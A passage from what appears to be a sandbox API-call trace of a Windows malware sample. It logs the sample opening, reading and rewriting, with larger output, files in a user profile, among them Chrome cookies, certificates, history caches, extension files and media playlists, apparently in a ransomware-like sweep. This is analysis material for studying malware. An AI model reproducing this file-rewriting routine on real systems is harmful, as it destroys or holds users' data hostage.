data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0175.280] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0175.280] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x3f45 [0175.280] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0175.281] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0175.281] ReleaseMutex (hMutex=0x168) returned 1 [0175.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0175.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7360c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0175.281] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0175.282] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x2f45 [0175.283] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0175.283] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x2f45 [0175.284] WriteFile (in: hFile=0x1dc, lpBuffer=0x25ad038*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad038*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0175.284] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0175.285] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0175.285] CloseHandle (hObject=0x1dc) returned 1 [0175.285] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0175.286] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0175.286] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x407a [0175.286] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0175.286] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0175.286] ReleaseMutex (hMutex=0x168) returned 1 [0175.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0175.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0175.286] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0175.288] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x307a [0175.288] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0175.289] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x307a [0175.289] WriteFile (in: hFile=0x1dc, lpBuffer=0x25ad038*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad038*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0175.289] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0175.289] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0175.289] CloseHandle (hObject=0x1dc) returned 1 [0175.289] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0175.290] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0175.290] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x48f1 [0175.290] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0175.291] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0175.291] ReleaseMutex (hMutex=0x168) returned 1 [0175.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0175.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7360c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0175.291] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0175.292] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x38f1 [0175.292] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0175.293] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x38f1 [0175.293] WriteFile (in: hFile=0x1dc, lpBuffer=0x25ad038*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad038*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0175.294] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0175.294] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0175.294] CloseHandle (hObject=0x1dc) returned 1 [0175.294] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History Provider Cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history provider cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0175.295] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0175.295] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x142f [0175.295] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0175.295] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0175.295] ReleaseMutex (hMutex=0x168) returned 1 [0175.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="History Provider Cache", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0175.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="History Provider Cache", cchWideChar=22, lpMultiByteStr=0x1f88c44, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="History Provider Cache", lpUsedDefaultChar=0x0) returned 22 [0175.295] ReadFile (in: hFile=0x1dc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x142f, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2fdf2bc*=0x142f, lpOverlapped=0x0) returned 1 [0176.002] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0176.002] WriteFile (in: hFile=0x1dc, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x19b7, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2fdf2d0*=0x19b7, lpOverlapped=0x0) returned 1 [0176.002] CloseHandle (hObject=0x1dc) returned 1 [0176.003] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\origin bound certs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0176.003] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0176.003] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1400 [0176.004] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0176.004] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0176.004] ReleaseMutex (hMutex=0x168) returned 1 [0176.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Origin Bound Certs", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0176.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Origin Bound Certs", cchWideChar=18, lpMultiByteStr=0x1f88c44, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Origin Bound Certs", lpUsedDefaultChar=0x0) returned 18 [0176.004] ReadFile (in: hFile=0x1dc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x1400, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2fdf2bc*=0x1400, lpOverlapped=0x0) returned 1 [0176.060] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0176.060] WriteFile (in: hFile=0x1dc, lpBuffer=0x25ab808*, nNumberOfBytesToWrite=0x1988, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x25ab808*, lpNumberOfBytesWritten=0x2fdf2d0*=0x1988, lpOverlapped=0x0) returned 1 [0176.060] CloseHandle (hObject=0x1dc) returned 1 [0176.060] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\manifest-000001"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0176.061] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0176.061] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x29 [0176.061] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0176.061] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0176.061] ReleaseMutex (hMutex=0x168) returned 1 [0176.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MANIFEST-000001", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0176.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MANIFEST-000001", cchWideChar=15, lpMultiByteStr=0x1f7366c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MANIFEST-000001", lpUsedDefaultChar=0x0) returned 15 [0176.061] ReadFile (in: hFile=0x1dc, lpBuffer=0x1fa54d8, nNumberOfBytesToRead=0x29, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fa54d8*, lpNumberOfBytesRead=0x2fdf2bc*=0x29, lpOverlapped=0x0) returned 1 [0176.062] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0176.062] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5b1, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5b1, lpOverlapped=0x0) returned 1 [0176.063] CloseHandle (hObject=0x1dc) returned 1 [0176.063] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing cookies"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0176.063] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0176.063] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1c00 [0176.063] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0176.063] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0176.064] ReleaseMutex (hMutex=0x168) returned 1 [0176.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Safe Browsing Cookies", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0176.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Safe Browsing Cookies", cchWideChar=21, lpMultiByteStr=0x1f88c44, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Safe Browsing Cookies", lpUsedDefaultChar=0x0) returned 21 [0176.064] ReadFile (in: hFile=0x1dc, lpBuffer=0x25ab808, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x25ab808*, lpNumberOfBytesRead=0x2fdf2bc*=0x1c00, lpOverlapped=0x0) returned 1 [0176.091] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0176.091] WriteFile (in: hFile=0x1dc, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x2188, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2fdf2d0*=0x2188, lpOverlapped=0x0) returned 1 [0176.092] CloseHandle (hObject=0x1dc) returned 1 [0176.092] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0176.093] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0176.093] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x43 [0176.094] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0176.094] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0176.094] ReleaseMutex (hMutex=0x168) returned 1 [0176.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0176.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7342c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0176.094] ReadFile (in: hFile=0x1dc, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x43, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x2fdf2bc*=0x43, lpOverlapped=0x0) returned 1 [0176.095] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0176.095] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5cb, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5cb, lpOverlapped=0x0) returned 1 [0176.095] CloseHandle (hObject=0x1dc) returned 1 [0176.095] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\01_music_auto_rated_at_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0176.096] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0176.096] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x414 [0176.096] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0176.096] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0176.096] ReleaseMutex (hMutex=0x168) returned 1 [0176.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="01_Music_auto_rated_at_5_stars.wpl", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0176.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="01_Music_auto_rated_at_5_stars.wpl", cchWideChar=34, lpMultiByteStr=0x1fa54dc, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="01_Music_auto_rated_at_5_stars.wpl", lpUsedDefaultChar=0x0) returned 34 [0176.096] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e99d58, nNumberOfBytesToRead=0x414, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99d58*, lpNumberOfBytesRead=0x2fdf2bc*=0x414, lpOverlapped=0x0) returned 1 [0176.098] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0176.098] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x99c, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x99c, lpOverlapped=0x0) returned 1 [0176.098] CloseHandle (hObject=0x1dc) returned 1 [0176.098] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl" (normalized: 